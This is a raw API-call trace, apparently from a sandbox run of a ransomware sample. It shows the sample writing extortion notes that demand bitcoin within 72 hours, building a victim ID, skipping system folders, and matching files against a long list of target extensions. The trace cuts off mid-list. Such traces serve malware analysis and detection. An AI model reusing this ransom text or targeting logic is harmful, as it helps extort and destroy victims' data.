	[0194.854] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0194.854] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0195.296] CloseHandle (hObject=0x380) returned 1
	[0195.297] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.297] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.297] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0195.298] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0195.298] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\nethood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0195.298] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0195.299] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0195.299] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0195.299] CloseHandle (hObject=0x380) returned 1
	[0195.299] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.300] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.300] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0195.300] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\NetHood\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0195.300] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\nethood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0195.301] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0195.301] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0195.304] CloseHandle (hObject=0x380) returned 1
	[0195.305] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.305] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.306] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0195.307] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0195.308] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\nethood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0195.308] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0195.308] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0195.308] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0195.308] CloseHandle (hObject=0x380) returned 1
	[0195.308] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\nethood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b38f392, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b38f392, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Y_FZ9P~1.SCL")) returned 0xffffffff
	[0195.308] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0195.308] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf5aa017c, ftLastAccessTime.dwHighDateTime=0x1d97680, ftLastWriteTime.dwLowDateTime=0xf5aa017c, ftLastWriteTime.dwHighDateTime=0x1d97680, nFileSizeHigh=0x0, nFileSizeLow=0x140000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1
	[0195.308] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xb3000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1
	[0195.308] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xa2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1
	[0195.309] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1
	[0195.309] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1
	[0195.309] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1
	[0195.309] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1
	[0195.309] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1
	[0195.309] lstrcmpW (lpString1="OneDrive", lpString2="..") returned 1
	[0195.309] lstrcmpW (lpString1="OneDrive", lpString2=".") returned 1
	[0195.309] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0195.309] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0195.309] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="OneDrive" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive"
	[0195.309] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\OneDrive" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive"
	[0195.309] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\"
	[0195.309] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\"
	[0195.309] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*"
	[0195.309] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0195.310] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*") returned 34
	[0195.310] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.310] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*") returned 0x22
	[0195.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.310] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="windows") returned 0x0
	[0195.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.310] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="boot") returned 0x0
	[0195.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.310] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="system volume information") returned 0x0
	[0195.310] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.311] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0195.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.311] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="temp") returned 0x0
	[0195.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.311] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="program files") returned 0x0
	[0195.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.311] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="program files (x86)") returned 0x0
	[0195.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.311] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="appdata") returned 0x0
	[0195.311] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.312] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="application data") returned 0x0
	[0195.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.312] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="winnt") returned 0x0
	[0195.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.312] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="tmp") returned 0x0
	[0195.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.312] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="cache") returned 0x0
	[0195.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.312] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="temporary internet files") returned 0x0
	[0195.312] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.313] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="webcache") returned 0x0
	[0195.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.313] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="inetcache") returned 0x0
	[0195.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.313] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="nvidia") returned 0x0
	[0195.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.313] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="packages") returned 0x0
	[0195.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.313] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="cookies") returned 0x0
	[0195.313] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.314] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\*.*", lpSrch="programdata") returned 0x0
	[0195.314] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0195.314] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0195.314] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0195.314] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0195.314] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\"
	[0195.314] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini"
	[0195.314] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini") returned 42
	[0195.314] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.314] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini") returned 0x2a
	[0195.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.315] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.315] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini"
	[0195.315] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini") returned 42
	[0195.315] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.315] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0195.315] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.316] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.j